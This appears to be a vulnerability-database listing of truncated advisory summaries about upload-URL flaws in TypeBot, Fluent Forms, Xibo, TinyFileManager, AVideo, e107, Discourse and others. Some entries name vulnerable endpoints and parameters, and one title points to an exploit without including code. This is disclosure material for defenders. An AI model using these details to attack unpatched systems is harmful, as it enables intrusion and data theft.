CVE-2026-48768 TypeBot: Unauthenticated arbitrary s3 object write in generate-upload-url via unsanitized fileName

TypeBot is a chatbot builder tool. In versions 3.16.1 and earlier, POST /api/blocks/file-input/v3/generate-upload-url is unauthenticated and uses unsanitized fileName input to construct public/ S3 object keys, while issuing presigned PUT URLs that do not bind Content-Type. As a result, any...

CVE-2026-48768

TypeBot (versions ≤ 3.16.1) exposes an unauthenticated generate-upload-url API (/api/blocks/file-input/v3/generate-upload-url) that uses unsanitized fileName to derive public S3 keys and issues presigned PUT URLs that do not bind Content-Type. This allows anonymous users of a published bot with a...

CVE-2026-6344

The Fluent Forms plugin for WordPress is vulnerable to Arbitrary File Read in versions up to and including 6.2.1. This is due to insufficient path validation in the getAttachments method of EmailNotificationActions, which resolves attacker-supplied file-upload URLs into filesystem paths without...

CVE-2026-42141 Xibo: Authenticated Server-Side Request Forgery (SSRF) in Library Upload via URL functionality

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery SSRF vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests fr...

EUVD-2026-27536

The Fluent Forms plugin for WordPress is vulnerable to Arbitrary File Read in versions up to and including 6.2.1. This is due to insufficient path validation in the getAttachments method of EmailNotificationActions, which resolves attacker-supplied file-upload URLs into filesystem paths without...

Exploit for CVE-2026-42141

CVE-2026-42141 - xibo CMS SSRF SSRF vulnerability in Xibo CMS...

CVE-2026-6497 prasathmani TinyFileManager File Upload filemanager.php server-side request forgery

A vulnerability was determined in prasathmani TinyFileManager up to 2.6. Affected by this vulnerability is an unknown functionality of the file /filemanager.php?p= ajax=true&type=upload of the component File Upload Handler. This manipulation of the argument uploadurl causes server-side request...

PT-2026-33461

Name of the Vulnerable Software and Affected Versions prasathmani TinyFileManager versions prior to 2.7 Description An issue in the File Upload Handler component allows for server-side request forgery, a flaw where an attacker can induce the server to make requests to an unintended location. This...

Payload 路径遍历漏洞

Payload is a headless CMS and application framework built using TypeScript, Node.js, React, and MongoDB. Versions of Payload prior to 3.78.0 contained a path traversal vulnerability. This vulnerability stemmed from the client-side upload signature URL endpoint not properly cleaning file names,...

CVE-2026-33319 AVideo Vulnerable to OS Command Injection via Unescaped URL in LinkedIn Video Upload Shell Command

WWBN AVideo is an open source video platform. Prior to version 26.0, the uploadVideoToLinkedIn method in the SocialMediaPublisher plugin constructs a shell command by directly interpolating an upload URL received from LinkedIn's API response, without sanitization via escapeshellarg. If an attacke...

CVE-2026-33319

Summary: CVE-2026-33319 affects WWBN AVideo prior to 26.0 via the SocialMediaPublisher/SocialUploader.php. The vulnerability is an OS command injection because the code builds a shell command by concatenating an untrusted upload URL from LinkedIn’s API with a file path and passes it to exec(), wi...

CVE-2022-50916

e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.ph...

CVE-2022-50916

e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.ph...

CVE-2022-35246

A NoSQL-Injection information disclosure vulnerability vulnerability exists in Rocket.Chat...

CVE-2025-62647

The Restaurant Brands International RBI assistant platform through 2025-09-06 provides the functionality of returning a JWT that can be used to call an API to return a signed AWS upload URL, for any store's path...

EUVD-2025-34925

The Restaurant Brands International RBI assistant platform through 2025-09-06 provides the functionality of returning a JWT that can be used to call an API to return a signed AWS upload URL, for any store's path...

EUVD-2021-8679

Malicious code in bioql PyPI...

CVE-2025-44594

halo v2.20.17 and before is vulnerable to server-side request forgery SSRF in /apis/uc.api.storage.halo.run/v1alpha1/attachments/-/upload-from-url...

Unspecified vulnerability in Discourse (CNVD-2024-14089)

Discourse is an open source community discussion platform. The platform includes features such as community, email and chat rooms. Discourse suffers from a security vulnerability that can be exploited by an attacker to access a secure upload URL associated with a post...

Discourse 访问控制错误漏洞

Discourse is an open source community discussion platform. The platform includes features such as community, email and chat rooms. Discourse suffers from a security vulnerability that can be exploited by an attacker to access a secure upload URL associated with a post...